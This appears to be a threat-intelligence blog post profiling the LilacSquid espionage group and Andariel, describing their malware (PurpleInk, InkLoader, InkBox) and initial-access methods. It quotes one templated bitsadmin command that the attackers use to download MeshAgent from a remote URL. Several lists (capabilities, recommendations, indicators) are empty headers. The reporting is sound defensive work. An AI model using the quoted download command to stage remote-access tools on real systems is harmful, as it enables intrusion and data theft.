Last month, Avertium’s Cyber Threat Intelligence team reported on an advanced persistent threat actor (APT) known as LilacSquid. This month, we are digging further to uncover the threat actor's tactics and techniques.
Active since at least 2021, LilacSquid (also known as UAT-4820) focuses on cyber espionage. This threat actor has targeted IT companies developing software for research and industrial sectors in the U.S., energy sector organizations in Europe, and pharmaceutical companies in Asia.
The threat actor uses various tactics, techniques, and procedures that resemble those used by North Korean APT groups, specifically Andariel and its overarching structure, Lazarus. Their campaign utilizes MeshAgent, an open-source remote management tool, along with a customized version of QuasarRAT, referred to as "PurpleInk," as primary implants following the compromise of vulnerable application servers exposed to the internet. Let’s look at LilacSquid, as well as recommendations on how organizations can protect themselves from this kind of threat actor.
As previously stated, LilacSquid has been active since at least 2021. The threat actor targets IT enterprises in the U.S., energy industries across Europe, and pharmaceutical firms throughout Asia. Their primary goals are information theft and espionage.
LilacSquid aims to maintain extended access to compromised entities to exfiltrate valuable data to their own servers. To achieve initial access, LilacSquid uses a variety of techniques, such as exploiting vulnerabilities in publicly accessible application servers and utilizing compromised RDP credentials.
The tactics, techniques, and procedures (TTPs) used by the LilacSquid closely resemble those of North Korean advanced persistent threat groups, such as Andariel and its parent organization, Lazarus. Notably, the use of MeshAgent software to maintain access post-compromise and the extensive use of proxy and tunneling tools suggest a possible connection between LilacSquid and Lazarus, indicating they might share tools, infrastructure, or other resources.
LilacSquid begins its attack by exploiting vulnerabilities in web applications. After gaining access, the threat actor deploys scripts to create folders for malware, then downloads and executes MeshAgent, an open-source remote management tool. This download typically uses the legitimate Windows tool bitsadmin with the following command:
bitsadmin /transfer -job_name- /download /priority normal -remote_URL- -local_path_for_MeshAgent-
MeshAgent uses a text configuration file called an MSH file, which includes a victim identifier and the Command & Control address. This tool allows the operator to list all target devices, view and control desktops, manage files, and collect system information. Once MeshAgent is running, it activates other tools like Secure Socket Funneling for proxying and tunneling communications, and the InkLoader/PurpleInk malware implants.
According to an analysis by Cisco Talos, when LilacSquid used compromised RDP credentials for access, the infection chain changed slightly. They either deployed MeshAgent and subsequent implants or introduced another component before PurpleInk.
InkLoader is a straightforward yet effective .NET-based malware loader, designed to execute a hardcoded executable or command. In this infection chain, InkLoader is the component that persists across reboots on the infected host, rather than the actual malware it runs. So far, we have only observed PurpleInk being executed via InkLoader, but LilacSquid might use InkLoader to deploy additional malware implants.
Talos observed that LilacSquid deployed InkLoader along with PurpleInk only when they successfully created and maintained remote sessions via RDP using stolen credentials. A successful RDP login led to the download of InkLoader and PurpleInk, copying these artifacts into the desired directories on disk, and registering InkLoader as a service. This service then started InkLoader, which in turn deployed PurpleInk.
Image 1: LilacSquid's Initial Access
Source: Cisco Talos
The primary implant used by the LilacSquid threat actor, PurpleInk, is derived from QuasarRAT, a remote access tool available online since at least 2014. Development on PurpleInk began in 2021, starting from the QuasarRAT base, and it continues to receive updates. The malware is heavily obfuscated to make detection more difficult.
PurpleInk uses a base64-encoded configuration file containing the IP address and port number for the C2 server. It can gather basic information such as drive details (volume labels, root directory names, drive type, and format), running process information, and system information (memory size, username, computer name, IP addresses, computer uptime).
Additionally, PurpleInk can enumerate folders, file names, and sizes, and modify file contents. It can also start a remote shell and send or receive data from a specified remote address, usually a proxy server. Below are the capabilities PurpleInk has for communicating with its proxy servers:
InkBox is a malware loader designed to read from a predefined file path on disk and decrypt its contents. The decrypted content consists of another executable assembly, which is then executed by invoking its Entry Point within the InkBox process. This second assembly serves as the backdoor known as PurpleInk.
Since 2021, LilacSquid has been using InkBox to deploy PurpleInk. From 2023 onward, they modified their approach, allowing PurpleInk to run independently as a separate process. However, even in this updated method, PurpleInk is still initiated through another component called "InkLoader."
As previously mentioned, LilacSquid’s TTPs closely resembles Andariel’s which is a threat actor under Lazarus. Like LilacSquid, Andariel, also known as Nickel Hyatt, Onyx Sleet, and Silent Chollima, is an advanced persistent threat (APT) group affiliated with North Korea's strategic interests. The group has been active since 2008 and is known for utilizing tactics such as spear-phishing, watering hole attacks, and exploiting known security vulnerabilities in software to gain initial access and deploy malware within targeted networks.
Andariel initially focused on information theft and cyber espionage activities primarily within the defense sector. However, after 2016, it shifted its focus to include monetary gain objectives and became involved in ransomware attacks, targeting the banking and technology sectors.
Andariel actively exploited the Log4j vulnerability last year, and a new malware called EarlyRat was discovered on a system affected by the Log4j exploit. However, the initial attack vector for EarlyRat was found to be spear phishing.
EarlyRat is straightforward in design and can execute specified commands. It shares similarities with MagicRat. It was distributed via a spear phishing campaign originating from servers associated with the HolyGhost/Maui ransomware campaign, involving macro-enabled documents. Upon execution, it communicates system information to its command and control (C2) server.
As of June 2024, Andariel has been observed deploying a new Golang-based backdoor named Dora RAT in its operations targeting educational institutions, manufacturing companies, and construction firms in South Korea.
The threat actor likely utilizes malicious tools like Keylogger, Infostealer, and proxy tools to manage compromised systems and extract data. The attacks involve the exploitation of a vulnerable Apache Tomcat server for malware distribution. The specific server involved was running an outdated 2013 version of Apache Tomcat, exposing it to multiple vulnerabilities.
To protect your organization from initial compromise tactics used by LilacSquid, it is essential to:
It’s important to get ahead of the curve by being proactive with protecting your organization, instead of waiting to put out a massive fire. Avertium can provide the following services to help keep your organization safe from MITM attacks:
LilacSquid
Andariel
LilacSquid
SHA-256
IPv4
Andariel
IPv4
LilacSquid: The stealthy trilogy of PurpleInk, InkBox and InkLoader (talosintelligence.com)
Deciphering LilacSquid's Strategies for Long-Term Data Theft (hivepro.com)
Global cyberespionage campaign deployed by LilacSquid | SC Media (scmagazine.com)
Andariel Group unleashes New EarlyRAT malware - HiveForce Labs Threat Advisory (hivepro.com)
New "LilacSquid" Cyberespionage Group and Custom Malware Discovered | Cyber Insider
Unveiling the Depths of LilacSquid Attacks | by Scott Bolen | RONIN OWL CTI | Jun, 2024 | Medium
june-4-23-lilacsquid-the-stealthy-trilogy-of-purpleink-inkbox-and-inkloader.pdf (mphasis.com)
Andariel Hackers Target South Korean Institutes with New Dora RAT Malware (thehackernews.com)
Cyber Espionage Alert: LilacSquid Targets IT, Energy, and Pharma Sectors (thehackernews.com)
Ink Trails by LilacSquid: PurpleInk, InkBox, and InkLoader | Cyware Alerts - Hacker News
This document and its contents do not constitute, and are not a substitute for, legal advice. The outcome of a Security Risk Assessment should be utilized to ensure that diligent measures are taken to lower the risk of potential weaknesses be exploited to compromise data.
Although the Services and this report may provide data that Client can use in its compliance efforts, Client (not Avertium) is ultimately responsible for assessing and meeting Client's own compliance responsibilities. This report does not constitute a guarantee or assurance of Client's compliance with any law, regulation or standard.